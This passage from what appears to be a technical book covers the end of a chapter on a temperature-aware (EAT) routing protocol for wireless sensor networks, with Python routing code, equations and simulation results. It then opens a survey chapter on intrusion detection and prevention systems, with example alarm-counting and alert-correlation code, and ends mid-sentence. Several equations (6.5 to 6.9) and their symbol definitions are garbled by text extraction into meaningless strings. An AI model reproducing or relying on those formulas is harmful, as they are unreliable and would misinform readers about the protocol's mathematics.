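    that reaches dst a minimum-hop path. Returns a list of names or None.
    """
    parent = {src: None}
    queue = deque([src])
    while queue:
        cur = queue.popleft()
        if cur == dst:
            path = []
            while cur is not None:
                path.append(cur)
                cur = parent[cur]
            return path[::-1]
        for nxt in net[cur].neighbors:
            if nxt in parent or nxt in avoid:
                continue
            node = net[nxt]
            if nxt != dst and (node.temp >= TH_MIN or node.energy < E_MIN):
                continue            # request is discarded at this node
            parent[nxt] = cur
            queue.append(nxt)
    return None


def forward(net, path, priority):
    """Transmission phase along an established path.

    Returns ("delivered", None), ("reroute", name) when a relay's
    surroundings exceed TH_MAX, or ("dropped", name) when a relay hotter
    than TH_MAX refuses a packet that is not critical.
    """
    if priority not in ("normal", "abnormal", "critical"):
        raise ValueError("unknown priority")
    for name in path[1:-1]:
        node = net[name]
        if node.env_temp > TH_MAX:      # surrounding temperature first
            return ("reroute", name)
        if node.temp > TH_MAX and priority != "critical":
            return ("dropped", name)
    return ("delivered", None)


def send(net, src, dst, priority):
    """Discover a path, forward, and re-discover around heat zones."""
    avoid = set()
    while True:
        path = discover_path(net, src, dst, frozenset(avoid))
        if path is None:
            return ("no_path", None)
        status, where = forward(net, path, priority)
        if status != "reroute":
            return (status, path)
        avoid.add(where)   # packet returned to source; skip the heat zone


def demo_network():
    """Constructed topology: S-A-D (2 hops) and S-B-C-D (3 hops)."""
    return {
        "S": Node(30, 30, 2.0, ["A", "B"]),
        "A": Node(35, 30, 1.5, ["S", "D"]),
        "B": Node(32, 30, 1.8, ["S", "C"]),
        "C": Node(33, 30, 1.7, ["B", "D"]),
        "D": Node(30, 30, 2.0, ["A", "C"]),
    }


if __name__ == "__main__":
    net = demo_network()
    route = discover_path(net, "S", "D")
    net["A"].temp = 85.0                    # relay heats up after setup
    print(route, forward(net, route, "normal"), forward(net, route, "critical"))
```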


6.5.1 Sensor Node Environmental Modeling and Analysis 


The influence of temperature on sensor node and its effects on the data 
transmission, delay and energy consumption is observed. However, in the 
atmosphere there are many environmental factors like humidity, moisture, 
electromagnetic interference and temperatures that influence the sensor 
node's performance. Of the above-mentioned parameters, temperature 
is one of the most influencing factors which degrades the performance of 
the sensor node. In this paper, the focus is on the influence of environmental 
temperature on the sensor node. Thus, single node environmental influence and 
multi-node environmental influence modeling is developed to analyze the influence 
of temperature on sensor nodes. 


6.5.2 Single Node Environmental Influence Modeling 


The threshold temperature is fixed for each sensor node to identify the 
surrounding temperature around the single node. The threshold value is 
fixed based on surrounding temperature for best operation. Each node 
continuously senses the surrounding temperature. If the surrounding 
temperature is minimum and below the threshold value (-10 °C to 10 
°C) the values are calculated using Eq. 6.1. If the node is deployed in
a normal environmental temperature field of 10 °C to 80 °C, the external
environmental influence is set to 1, as given in Eq. 6.2. At
this point, the temperature influence is considered as negligible. If the
temperature exceeds maximum threshold value, then Eq. 6.3 is used to 
calculate the field temperature. 


$T_e^k(n) = N_0^k, \quad T^k(n) < T_{low}^k$    (6.1)

$T_e^k(n) = 1, \quad T_{low}^k \le T^k(n) \le T_{high}^k$    (6.2)

$T_e^k(n) = N_1^k, \quad T^k(n) \ge T_{high}^k$    (6.3)


Where $T_e^k(n)$ is a single node surrounding environmental temperature
field, $T_{low}^k$, $T_{high}^k$ are defined as the sensor normal
operation at k environmental factor. $T_{min}^k$, $T_{max}^k$ is the
sensor node operating threshold set point. $T^k(n)$ is temperature of
individual node at k environmental factor.
$N_0^k = \frac{T^k(n) - T_{min}^k}{T_{low}^k - T_{min}^k}$ for low
environmental temperature field and
$N_1^k = \frac{T_{max}^k - T^k(n)}{T_{max}^k - T_{high}^k}$ is defined
for high environmental temperature field. If


the data is transmitted through a node (n) and T*() changes to the state 
1. It indicates that the temperature of a particular node increases. At this 
stage the protocol verifies the T*,. value. If the condition is satisfied, data 
transmission is terminated through that particular node.


6.5.3 Multiple Node Modeling


The data packets are transmitted through multiple nodes to reach their 
destination. Therefore, multiple node temperature modeling is essential 
to understand the complete influence of environmental effect on sensor 
nodes. Due to the environmental factor, the lifetime of sensor node, energy 
of particular node and data losses of the node are being affected. To analyze 
the environmental temperature $T_e^k(n)$ influence on sensor node the
following Eq. 6.4 is used.


$T_m(N) = T_{min}\{T_e^k(n_1), T_e^k(n_2), T_e^k(n_3), \ldots, T_e^k(n)\}$    (6.4)


Where $T_e^k(n)$ is a single node surrounding temperature created by node
(n) at k factor. In a real-time environment, multiple factors like humidity, 
moisture and electromagnetic interference, etc., influence the node perfor- 
mance. In this study only temperature is taken into consideration. The path 
selection is done based on single node surrounding temperature value. To 
ensure continuous working of sensor nodes two threshold values, T.. and 
T. are fixed. If the temperature of sensor node increases beyond T._, , that 
specified node area is called as “unsafe zone” and this node is not selected 
for further communication purpose. This “unsafe zone” data is collected 
by neighboring node and the same node is continuously monitored until it 
returns to normal temperature. It is given in Eq. 6.5. 


T. (14, p) = Koy) Tyg (Ms Typ (P) (6.5) 


(n, p) ~ min min 


Where T. (n, p) is the neighboring field temperature potential of node 
(n) and node (p). 
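
As an added illustration (not code from the chapter), the sketch below combines the per-packet forwarding rule from the protocol steps with the "unsafe zone" rule for path selection: a minimum-hop route is searched while relay nodes hotter than Th_max are skipped. The topology, node names, temperatures and the "hold" outcome for non-critical packets are constructed assumptions; Th_max = 80 °C is the maximum operating temperature given in the simulation section.

```python
from collections import deque

TH_MAX = 80.0  # deg C, maximum operating temperature stated in the simulation section

# Constructed topology (assumption): node -> neighbours within radio range.
LINKS = {
    "S": ["A", "B"],
    "A": ["S", "C"],
    "B": ["S", "D"],
    "C": ["A", "T"],
    "D": ["B", "E"],
    "E": ["D", "T"],
    "T": ["C", "E"],
}

# Constructed temperatures in deg C (assumption): relay C is overheated.
NODE_TEMP = {"S": 40, "A": 42, "B": 41, "C": 85, "D": 45, "E": 44, "T": 40}


def min_hop_path(links, src, dst, node_temp, th_max=TH_MAX):
    """Breadth-first search for the fewest-hop path from src to dst.

    Relay nodes whose temperature exceeds th_max are treated as being in the
    "unsafe zone" and are never selected. Returns the path as a list of node
    names, or None when every route crosses an unsafe node.
    """
    prev = {src: None}
    queue = deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for nxt in links[node]:
            if nxt in prev:
                continue
            if nxt != dst and node_temp[nxt] > th_max:
                continue  # unsafe zone: do not relay through this node
            prev[nxt] = node
            queue.append(nxt)
    return None


def forward_decision(env_temp, node_temp, priority, th_max=TH_MAX):
    """Apply the two temperature checks to one packet at one node.

    priority is "normal", "abnormal" or "critical".
    "return-to-source": surrounding temperature too high, source must pick
                        an alternative path.
    "forward":          packet is sent on.
    "hold":             assumption for non-critical packets at a hot node;
                        the chapter only says critical data is forwarded.
    """
    if env_temp > th_max:
        return "return-to-source"
    if node_temp > th_max:
        return "forward" if priority == "critical" else "hold"
    return "forward"


if __name__ == "__main__":
    print("route avoiding unsafe zone:", min_hop_path(LINKS, "S", "T", NODE_TEMP))
    cool = dict(NODE_TEMP, C=45)
    print("route once C has cooled:   ", min_hop_path(LINKS, "S", "T", cool))
    for prio in ("normal", "abnormal", "critical"):
        print(prio, "->", forward_decision(env_temp=40, node_temp=85, priority=prio))
```

With relay C above Th_max the three-hop route S-A-C-T is rejected in favour of the four-hop route through B, D and E, which is the longer-path, higher-energy behaviour the results section attributes to rerouting.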


6.5.4 Sensor Node Surrounding Temperature Field 


The total environmental temperature of a particular sensor node (n) is 
defined by combining the multiple node environment T, (n) and neigh- 
boring field environment T. (n, p). It is given in Eq. 6.6. 


Ton (n) = [Tn(n) + T.(n, p)] / [1 + k(n,p)]    (6.6)


Where t (n) is environment of particular sensor node, K, s environ- 
mental factor at node (n) and node (p). 




6.5.5 Sensor Node Remaining Energy Calculation 


To ensure continuous operation of sensor node, remaining energy calcula- 
tion is very important. The remaining energy (E, (n)) of particular node is 
calculated using Eq. 6.7. 


Eng (n) = E,(n,t) / E;(n)    (6.7)


Where Eis the remaining available energy of node (n) at the time of 
(t), E.(n) is the initial energy available while deploying the sensor node (n). 
Utilizing Eq. 6.7 the remaining energy of a particular node at time (t) can 
be determined. But the required energy for sensor operation is calculated 
using Eq. 6.8. 


PB 
T,(n) = in ss 1) + Ee + nP.x a Pa + Pyp + 2 Prrrequency startup (6.8) 


r 


Where P. denotes the node receiving operation, P,. performs data 
transmission, P, , indicates node in idle state, P,, is the nodes in sleep state, 
P_frequency startup is the radio frequency startup power during transmission, P,
and T is the data and transmission rate of packets. In a network, all nodes 
perform many operations like sensing, transmission, receiving, sleep and 
idle stage. Each stage of sensor operation consumes a different energy level 
from the battery. 


6.5.6 Delay Modeling 


The data being transferred from source to destination will undergo dif- 
ferent delays along its desired path. The types of delay include processing 
delay, queuing delay and sensing delay. The processing delay arises during 
data transmission from one node to another node. Queuing delay is due to 
the nodes transmitting previous data packets. The sensing delay is with the 
initialization of nodes for data transmission. Moreover, transmission delay 
occurs while sending the data, and reception delay is during data reception 
at each node. 


D,(n)= (Dyn + Dors + Dgu + Dix(n) + Dx(n))+ Liw Ri (6.9)


Where D,, is sum of delay, D,, is sensing process delay, D,,, is process
delay, D,,, is queuing delay, D,, is transmission delay, D,, is receiving delay 


and }’,, Rj is relay node processing delay. 


6.6 Simulation Parameters 


The EAT protocol is simulated using MATLAB. The sensors are assumed
to be deployed within an area of 250 x 250 m. The total number of sen- 
sor nodes used is around 100 and the range is set to 50 m from source 
to destination. The ambient temperature is kept at 40°C. The minimum 
and maximum operating temperature is around 10°C and 80°C. In the 
simulation model, the node’s position is fixed and has the same transmis- 
sion range. The specific heat of the node is fixed as constant value. The 
node gets cooled down at the rest state of the sensor node. The multi-hop 
network model is prepared. During installation, all nodes are placed at 
uniform distance with equal energy. The simulation parameters used are 
shown in Table 6.1. 


Table 6.1 Simulation parameters for environmental 
influence on sensor nodes. 


50 nJ/bit 
Cooling rate at rest position


6.7 Results and Discussion


In this section, the influence of temperature on networks, amount of power 
consumed, sensor network lifetime at three different cases and variation of 
delay at different temperature are discussed. 


6.7.1 Temperature Influence on Network 


The sensor network performance degrades and its malfunction probability 
also increases sharply at low and high temperature. If the node operates 
at normal environmental temperature, then the effect caused due to sur- 
rounding temperature on the network can be taken as negligible. Fig. 6.8 
shows the temperature influence on sensor nodes at three different cases. 
In case 1, normal operation (no temperature influence) is considered. 
Here, the sensor node operates at nominal temperature interval and does 
not consider the influence of temperature on sensor performance. In case 
2, the factors influencing the sensor node at different environment field 
are considered. As the surrounding environmental temperature increases, 
the sensor node temperature rises linearly at a time interval t. In case 3, 
the temperature variation of sensor nodes along the routing path due to 
continuous variation in environmental temperature is analyzed. 


6.7.2 Power Consumption 


The total amount of power consumed is determined by taking the
difference between initial energy and the remaining energy. The
environmental field ensures that the constructed multipath does not
utilize the sensor node whose temperature is beyond the maximum threshold
limit. The QoS field takes care of successful delivery of packets to sink.
The energy field helps to select an intermediate with high residual energy
to involve in the next hop of data transmission. Fig. 6.9 illustrates the
average power consumption of different data rate for case 1 to 3. From the
obtained results, it is observed that the amount of power consumed is less
in case 1 and case 2. In case 3 energy increases with data rate. Thus a
large amount of power is consumed in case 3, thereby reducing the node
lifetime considerably. Furthermore, the routing decisions get affected due
to residual energy and the data avoid passing through the node with lesser
energy.


Fig. 6.8 Temperature variation of sensor node at different time.
[Plot axes: Change in Temperature (c) vs. Time (s)]


Fig. 6.9 Average power consumption for different data rate.
[Plot axes: Avg. power consumption vs. Rate]


6.7.3 Lifetime Analysis 


Fig. 6.10 shows the lifetime analysis at different cases. In case 1, the sensor 
node works for longer duration compared to other two cases. In case 2 
condition, the nodes are influenced by environmental temperature which 
causes fast discharging of available energy in the battery. If the discharging 
rate of battery power increases, then the total lifetime of the sensor node 
gets decreased. In case 3, due to rerouting process the sensor spends more 
energy for transmitting the data to long distance. As the transmission dis- 
tance increases, the energy consumption will also remain high. Likewise, if 
the packet size increases then the energy consumption also increases. Thus 
the lifetime of sensor node gets reduced in case 3. Moreover, the improper 
energy calculation of sensor node during route node selection results in 
rapid death of sensor nodes within the network.


Fig. 6.10 Lifetime analysis for all three cases.


6.7.4 Delay Analysis 


The delay modeling is performed for all three cases and the
corresponding result (delay vs. temperature) is shown in Fig. 6.11. The
delay is measured based on the number of packets that reach within a
specified time interval. From the graph, it is observed that the delay is
minimum in case 1 as the transmitted data packets reach the destination
through the shortest path. So all nodes perform data transmission with
minimum delay. In case 2, the delay is high due to external temperature
influence on a particular sensor node. This results in the limited
operation of the node. At this condition, the data packet transmission
will be stopped and the neighboring nodes will update the current
temperature value of the affected node. Likewise, in case 3 the sender
node will completely reroute to the next shortest path. As the
transmission range increases, the delay gets increased during delivery of
data to destination node.


Fig. 6.11 Delivery delay analysis over temperature.


6.8 Conclusion 


WSNs are deployed in unattended areas and are provided with minimum 
energy for operation, which affects the network’s performance and life- 
time. Thus Environmental Aware Thermal (EAT) routing protocol was 
proposed. This protocol mainly concentrated on the effect of surrounding 
environmental temperature and selects an optimum routing path accord- 
ingly. Temperature, delay, lifetime and power consumption of sensor nodes 
at three different cases are analyzed. From the obtained results, it was 
inferred that case 1 results have efficient QoS and increased network life- 
time at normal environmental temperature. In case 2, as the temperature 
increases, the delay gets increased and network lifetime becomes minimum 
for a single sensor node. In case 3, a fully established sensor network was 
considered. In this case, the environmental temperature influence on the 
QoS, lifetime, and temperature of sensor nodes was observed. Therefore, 
the effect of environmental conditions on the performance of sensor node 
was analyzed. In future, other environmental factors like humidity, rain 
and moisture influence on EAT protocols need to be evaluated to analyze 
the effectiveness of the entire network operation. Also, the real-time
implementation of sensors and its corresponding data can be examined.


Abstract

A computer network is simply an interconnection of several computers that follow 
common communication protocols. As network intrusion has been increasingly 
affecting organizational systems and crucial data, it is imperative that there exists 
an effective network security system in place. This is where the role of a sound 
intrusion detection system becomes important in an era where attempts at unau- 
thorized access have become the norm rather than the exception. Such a system 
helps to keep malicious traffic at a distance and protects the computer network 
from a variety of threats. In this chapter, a study has been done in order
to understand the system of an Intrusion Detection and Prevention System
(IDPS), which not only helps in detecting an ongoing intrusion, but also
helps prevent it in future cases, along with its functioning and a
comparison between the two divisions. Towards the end, an attempt has been
made to list the administrator's functions towards ensuring the security
of the computer network and to understand what current challenges are
being faced by the researchers and how they have tried to solve them.


7.1 Introduction


7.1.1 Intrusion and Detection 


An intrusion can be defined as an attempt to compromise the computer
security policies, i.e., Confidentiality, Integrity, and Availability
(CIA), or an effort at bypassing the mechanisms enforced in a network for
security [1].

In 1980, the concept of Intrusion Detection was introduced by James 
Anderson, who proposed that a threat has the potential to access or manip- 
ulate information in an unauthorized manner. Intrusion Detection is 
the process that combines both the monitoring as well as the analysis of 
events in a computer network or system. Therefore, an Intrusion Detection 
System acts as a detector before information systems, deciding whether its 
monitored events are legitimate or symptomatic of an attack [2]. This is 
especially important in the case of wireless networks as wireless networks, 
as opposed to wired networks, are even more susceptible to attacks [3]. The 
model is presented below in Figure 7.1. 


7.1.2 Some Basic Definitions 


i. Threat: The potential likelihood of an intentional and 
unauthorized attempt towards: 


(a) Acquiring details 
(b) Modifying and manipulating information 
(c) Making a system vulnerable and unworkable [4] 


Figure 7.1 Intrusion detection working.
[Diagram blocks: Intrusion, Security Audit, Monitoring System, Data
Collection, Data Pre-processing, Intrusion Recognition, Alarm or Report]

ii. Risk: When the information is exposed accidentally or
impairment of hardware occurs or the software design is
faulty, the system is said to be at risk.

iii. Attack: When the attacker executes his plan of working 
out the threat, it is called an attack. 

iv. Penetration: An attack that succeeds in the unauthorized 
acquisition of files and programs of a computer system is 
called penetration. 


7.1.3 Intrusion Detection and Prevention System 


An Intrusion Detection System (IDS) is a method for monitoring any 
activity carried out by persons or computers which is deemed to be unau- 
thorized in nature [5]. These attempts could be intended to enter the com- 
puter system or might have secured actual access, sometime in the process. 
Possible incidents are identified and information about them is logged. 
An IPS or Intrusion Prevention System, on the other hand, is entrusted 
with preventing threats. Figures 7.2 (i) and 7.2 (ii) compare IDS and IPS, 
respectively. 

The Intrusion Detection and Prevention System (IDPS), being vested
with an added prevention element, focuses on attempts at stopping
intrusions and reporting them to the system administrators. Thus, IDPS
has the best of both worlds, IDS as well as IPS. Besides the usual function- 
ing, organizations are known to utilize the IDPSs for checking the effec- 
tiveness of their security policies and documenting the threats at hand. 

The IDPS differs from the IDS in that it also attempts to prevent the
attack or detected threat from succeeding. Thus, the IDPS picks up from
where the IDS has left off. As network and security threats continue to
show an alarming rise, the interest of researchers in this field has
increased manifold. Almost every organization, irrespective of its sector,
needs to have such a system in place to strengthen its security
infrastructure. Throughout this chapter, both these terms have been used
according to the context.


Figure 7.2 (i) IDS, and (ii) IPS.


7.1.4 Need for IDPS: More Than Ever 


The dependence of organizations big and small, civil and corporate societ- 
ies, public and private agencies, and countries on computer networks has 
reached great heights. The threat to those networks comes not just from 
external breaches; even insiders are known to abuse their privileges. Any 
such violation causing intended or unintended access, if gone unchecked, 
can lead to disastrous consequences for the network as a whole. If that 
is the case, the security of computer networks and therefore the secu- 
rity of the enormous quantities of data stored on them will be compro- 
mised. Therefore, risk management measures are of immense importance 
since they secure the IT systems and data that support the organizations’ 
missions. 

Statistics from Computer Emergency Response Team (CERT) show 
that the amount of such intrusions has been increasing dramatically with 
each passing year. As such, an efficient system to counter the challenges 
and reduce the vulnerability of network systems is indispensable. A strong 
security system enhances operational effectiveness and minimizes strate- 
gic and legal risks [6]. The Intrusion Detection and Prevention Systems, 
therefore, refer to both the hardware as well as the software that have auto- 
mated the process of intrusion detection. 


7.1.5 Introduction to Alarms 


When an attack on a system has been identified, one of the first responses 
of an IDPS is to generate a signal as a form of an alert. Such a signal when 
generated is said to be an alarm. This signal is significant to get the admin- 
istrator acquainted with the new event. There are four types of signals or 
alarms. In any event, one of the following alarms would be generated [7]: 


i. True Positive: Whenever there is an attack and the
Intrusion Detection System is able to identify it while
triggering an alarm, it is called the case of True Positive.

ii. False Positive: Whenever the Intrusion Detection System
produces an alarm but there is no attack, this is known as
the case of False Positive. The anomaly-based methodology
is overpowered by false positive alarms.

iii. True Negative: This is the case when no attack happens,
and corresponding to it, no alarm is generated by the
system.

iv. False Negative: This case is said to have occurred when the
attack had taken place, but no alarm was generated. The
anomaly-based methodology displays the highest number
of false negatives when compared to signature-based
method.


There is a massive quantity of alarms that are generated from the
intrusion detection systems. It becomes truly a cumbersome task to analyse
all of them. The onus is on the network system administrators. This
certainly means that there is always a possibility of overlooking some
important alerts, which could cost the system dearly [8]. Often it becomes
difficult to analyse what is happening to the system as a whole. New
technologies in the field are aimed to provide a working solution to
effectively tackle the huge quantity of signals generated.
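
The four alarm cases can be counted directly once each monitored event has a ground-truth label. The following is an added example, not code from the chapter: it sorts constructed events into the four classes, derives the detection and false-alarm rates, and then applies Bayes' rule to show why even an accurate detector buries administrators in false alarms when attacks are rare. The event list, the function names and the rates passed to `alarm_precision` are assumptions made for illustration.

```python
from collections import Counter

# Constructed sample: 12 monitored events, three of which are real attacks.
ATTACK_IDS = {3, 7, 11}
EVENTS = [(event_id, event_id in ATTACK_IDS) for event_id in range(1, 13)]

# Constructed sample: event ids on which the IDS raised an alarm.
ALARMED = {3, 5, 7, 9}


def classify(is_attack, alarmed):
    """Map one event to the alarm type defined in the list above."""
    if is_attack and alarmed:
        return "TP"  # attack, alarm raised
    if not is_attack and alarmed:
        return "FP"  # no attack, alarm raised
    if is_attack and not alarmed:
        return "FN"  # attack, no alarm
    return "TN"      # no attack, no alarm


def confusion(events, alarmed):
    """Count the four alarm types over labelled events."""
    counts = Counter({"TP": 0, "FP": 0, "TN": 0, "FN": 0})
    for event_id, is_attack in events:
        counts[classify(is_attack, event_id in alarmed)] += 1
    return counts


def rates(counts):
    """Detection rate, false-alarm rate and precision from the counts."""
    attacks = counts["TP"] + counts["FN"]
    benign = counts["FP"] + counts["TN"]
    alarms = counts["TP"] + counts["FP"]
    return {
        "detection_rate": counts["TP"] / attacks if attacks else 0.0,
        "false_alarm_rate": counts["FP"] / benign if benign else 0.0,
        "precision": counts["TP"] / alarms if alarms else 0.0,
    }


def alarm_precision(detection_rate, false_alarm_rate, base_rate):
    """P(attack | alarm) by Bayes' rule.

    base_rate is the fraction of monitored events that are attacks.
    """
    true_alarms = detection_rate * base_rate
    false_alarms = false_alarm_rate * (1.0 - base_rate)
    total = true_alarms + false_alarms
    return true_alarms / total if total else 0.0


if __name__ == "__main__":
    counts = confusion(EVENTS, ALARMED)
    print(dict(counts))
    print(rates(counts))
    # A detector that catches 99% of attacks with a 1% false-alarm rate,
    # watching traffic in which 1 event in 10,000 is an attack.
    print(f"P(attack | alarm) = {alarm_precision(0.99, 0.01, 1e-4):.4f}")
```

In the last case fewer than one alarm in a hundred corresponds to a real attack, which is the workload problem the paragraph above describes.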


7.1.6 Components of an IDPS 


i. Sensor: The sensor in an IDPS can sense threats by efficiently
monitoring the networks. The range of operation of
these sensors covers not just network-based technologies
but also the wireless and NBA-based technologies. In the
case of host-based intrusion detection technologies, there
is an “agent”, which is the functional equivalent of a sensor.

ii. Console: There is a need for an interface that could provide
the necessary link between the administrators and the
intrusion detection systems. The console serves this purpose.
They are most suitable for sensors’ configuration. It
is the user interface that allows the user to interact with
the intrusion detection system [9]. Many of these sensors
also perform software update activities in addition to their
tracking and monitoring jobs.

iii. Management server: These are mostly used in large-scale
firms. Available in software and appliance formats, the
server is the device to which the alerts and information
are sent. This central device acts as the platform where the
information deposited through alarms and alerts is stored.
Therefore, attacks against the management server can be
the most troublesome issues [10].

iv. Database server: The database server helps to have a
repository of the alerts. The information herein can be
periodically fed by the alarms as well as the management
server. A huge compilation of records about network intrusion
and allied events are kept here.


Figure 7.3 A typical IDPS Architecture.


The block diagram in Figure 7.3 gives the architecture of a typical IDPS. 


7.2 Configuring IDPS 


7.2.1 Network Architecture of IDPS 


The components of an IDPS can be connected through a common network 
that is the standard network of the organization. Such a network is called 
by different names, one of which is the production network. Alternatively, 
a totally different network can also be used. This second type of network 
is separately carved out for the management of various security and mon- 
itoring applications that are running all the time. If the latter is the case, it 
is said to be a management network [11]. 

This establishment means that the production and management net- 
works have been separated from each other, aiming towards no interference 
of any sort. To a management network, the management servers, database 
servers, and consoles are linked. This is very effective as it provides a mech- 
anism of concealment such that the underlying Intrusion Detection and 
Prevention System remains safe and secure to the extent possible.

Now that the rosy side of this architecture, with its multiple
advantages, has been discussed, there is a need to know the challenges as
well. First and foremost is the cost factor. Because a totally different
network is placed as a separate entity, the cost of procuring the
networking equipment and other hardware, for instance Personal Computers
for the consoles, increases [12]. A look at the effectiveness of the
system and the cost of its positioning is important to assess the
cost-benefit trade-off of employing the system. On top of that, there are
challenges for the network systems’ administrators, who are now required
to work with separate computers earmarked for monitoring and management of
the IDPS.


7.2.2 A Glance at Common Types 


The range or scope of their monitoring and their deployment determines 
the types of Intrusion Detection and Prevention Systems. Though there are 
roughly two divisions of IDS, viz., the Network-based (NIDS) and Host- 
based (HIDS), there remain quite a number of ways to classify and include 
some other divisions. In this chapter, they are divided into the following 
four types on the basis of their deployment and the types of events they 
detect: 


i. Network-based: The network-based intrusion detection 
and prevention systems monitor traffic in the network for 
some specific network segments and devices. This type of 
technology keeps track of suspicious activities by analys- 
ing the network and application protocol activity [13]. 

ii. NBA: The Network Behaviour Analysis is that type that
keeps a tab on the unusual flow of traffic. Such detection 
technologies are capable of examining not just malware but 
policy violations as well. These are very effective in moni- 
toring the DDoS type attacks. DDoS refers to Distributed 
Denial of Service. An NBA system typically works with 
sensors and consoles and less frequently, the management 
servers in addition. 

iii. Wireless: The wireless systems are those systems that 
examine and monitor unusual instances in the wireless 
protocols. Sometimes it is argued that the building of an 
IDPS in a wireless environment can be more challenging 
than in wired ones owing to certain practical connectiv- 
ity issues [14]. The components are similar to a network- 
based IDPS. 


iv. Host-based: These IDPSs are different in the sense that a
single host is monitored thoroughly. Any suspicious activity
that takes place within that host comes under the purview
of a host-based IDPS. This can keep an eye on system
logs, network traffic (both wireless and wired) confined
to that particular host, file access, and a range of other
domains.


A detailed insight into Network-based IDS and Host-based IDS is
discussed in the following section. Figure 7.4 and Figure 7.5 give a basic
structure of NIDS and HIDS, respectively.


Figure 7.4 NIDS.
[Diagram labels: Firewall, NIDS, Web Server, Mail Server, DNS]


Figure 7.5 HIDS.
[Diagram labels: Firewall, HIDS, Web Server, Mail Server, DNS]


7.2.2.1 Network-Based IDS


7.2.2.1.1 Network Architecture


The network communications are provided by the TCP/IP layers. The data 
across the network is passed through these layers beginning from the high- 
est layer to the lowest layer. Afterward, the lowest layer passes the data to 
the physical network. These are the four layers: 


i. Application layer: In this layer, application data is generated
through hundreds of application layer protocols.
Some of these protocols are Hypertext Transfer Protocol
or HTTP, Simple Mail Transfer Protocol or SMTP, File
Transfer Protocol or FTP, Domain Name System or DNS,
and Simple Network Management Protocol or SNMP. The
data at this stage is sent to the transport layer.

ii. Transport layer: This layer helps in the reliable delivery of
the application layer services to networks by either TCP
or UDP protocols. Transmission Control Protocol or TCP
and User Datagram Protocol or UDP are the generally
employed protocols at the transport layer.

iii. Network layer: The data received from the Transport layer
is managed and routed here. Data is transported in units
known as “packets” which have information about the IP
Version, IP protocol number, and IP addresses of source
and destination. This layer is also known as the Internet
Protocol layer.

iv. Hardware layer: This layer is responsible for linking the
hardware components of the network. Thus, it is here that
switches, cables, and routers are involved. The common
protocol used is Ethernet.


7.2.2.1.2 Data Collection and Detection Capabilities 

Some network-based IDSs first go for information gathering. As part of 
this, they collect information on hosts, operating systems, and applications. 
This helps them to identify potentially vulnerable hosts and applications. 
Machine learning and data mining in NIDS are being applied extensively 
to decode behaviour patterns [15]. 

Data fields like transport, network and application layer protocols,
source and destination ports, timestamp containing date and time, type
of alert, and IP addresses of source and destination are logged on a
large scale.

This massive logging helps the network-based IDS to check the authen- 
ticity of alerts and correlate the events when they occur the very next time. 
Network-based IDSs provide a wide range of detections. Signature and 
anomaly-based methods and their combinations are employed. The detec- 
tions are carried out based on already observed behaviours in real-time. 
Application layer attacks like malware intrusion, password cracking, and 
DoS attacks are detected through the analysis of numerous protocols like 
DNS, FTP, HTTP, SMTP, etc. Attacks with spoofed IP addresses are rec- 
ognized by analyzing network layer protocols like IPv4 and ICMP. These 
IDSs can detect policy violations too. 
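
To show how the logged fields listed above support correlation, here is an added example (not from the chapter and not any product's log format): it parses constructed alert records and merges alerts that share a source address and alert type within a time window into one incident, so an analyst reviews incidents rather than raw alerts. The CSV layout, the alert-type names, the 60-second window and the grouping key are all assumptions.

```python
import csv
import io
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Constructed sample alerts using documentation-range addresses; not real traffic.
SAMPLE_LOG = """\
timestamp,alert_type,proto,src_ip,src_port,dst_ip,dst_port
2024-01-10T09:00:01,port-scan,TCP,203.0.113.7,40001,192.0.2.10,22
2024-01-10T09:00:02,port-scan,TCP,203.0.113.7,40002,192.0.2.10,23
2024-01-10T09:00:03,port-scan,TCP,203.0.113.7,40003,192.0.2.10,80
2024-01-10T09:00:05,port-scan,TCP,203.0.113.7,40004,192.0.2.11,22
2024-01-10T09:00:20,dns-anomaly,UDP,198.51.100.4,53124,192.0.2.53,53
2024-01-10T09:00:30,password-guess,TCP,203.0.113.7,40100,192.0.2.10,21
2024-01-10T09:00:40,password-guess,TCP,203.0.113.7,40101,192.0.2.10,21
2024-01-10T09:05:00,port-scan,TCP,203.0.113.7,40200,192.0.2.10,443
"""


@dataclass
class Incident:
    """A run of related alerts from one source, of one alert type."""
    src_ip: str
    alert_type: str
    first_seen: datetime
    last_seen: datetime
    count: int = 0
    targets: set = field(default_factory=set)  # (dst_ip, dst_port) pairs


def parse_alerts(text):
    """Read alert rows, convert field types, and return them in time order."""
    alerts = []
    for row in csv.DictReader(io.StringIO(text)):
        row["timestamp"] = datetime.fromisoformat(row["timestamp"])
        row["src_port"] = int(row["src_port"])
        row["dst_port"] = int(row["dst_port"])
        alerts.append(row)
    return sorted(alerts, key=lambda a: a["timestamp"])


def correlate(alerts, window=timedelta(seconds=60)):
    """Group time-ordered alerts into incidents.

    An alert joins the open incident with the same (src_ip, alert_type) when
    it arrives within `window` of that incident's last alert; otherwise it
    opens a new incident. Incidents are returned in order of first_seen.
    """
    open_incidents = {}
    incidents = []
    for alert in alerts:
        key = (alert["src_ip"], alert["alert_type"])
        incident = open_incidents.get(key)
        if incident is None or alert["timestamp"] - incident.last_seen > window:
            incident = Incident(alert["src_ip"], alert["alert_type"],
                                alert["timestamp"], alert["timestamp"])
            open_incidents[key] = incident
            incidents.append(incident)
        incident.last_seen = alert["timestamp"]
        incident.count += 1
        incident.targets.add((alert["dst_ip"], alert["dst_port"]))
    return incidents


if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_LOG)
    incidents = correlate(alerts)
    print(f"{len(alerts)} alerts -> {len(incidents)} incidents")
    for inc in incidents:
        print(f"{inc.first_seen:%H:%M:%S}  {inc.src_ip:<14} {inc.alert_type:<15}"
              f" alerts={inc.count} distinct targets={len(inc.targets)}")
```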


7.2.2.1.3 Limitations 

Inside the host machines, NIDS has very limited visibility. Ideally, the NIDS 
should be installed where detection has to be done before encryption or 
after decryption. It is so because the Network-based IDSs are not able to 
detect threats where the network traffic is encrypted. Another drawback is 
that in case of heavy load and large traffic, these IDSs are not as effective. 
In fact, then they become vulnerable to many attacks. 


7.2.2.2 Host-Based IDS 


7.2.2.2.1 Network Architecture 

Compared to the Network-based IDSs, the Host-based ones have fairly easy 
deployments. Usually, there is no requirement of a separate management 
network as the detection software of these IDSs (also called Agents) is put 
up with the hosts in exactly the same network. These agents are installed 
in line with the host that is to be protected. For example, in the case
of appliance-based agents, the IDS consoles could be erected in line with
the router, switch, and firewall.


7.2.2.2.2 Data Collection and Detection Capabilities 
Each agent monitors a single host which could be a desktop or an applica- 
tion like a database program or a server's operating system. For example, 
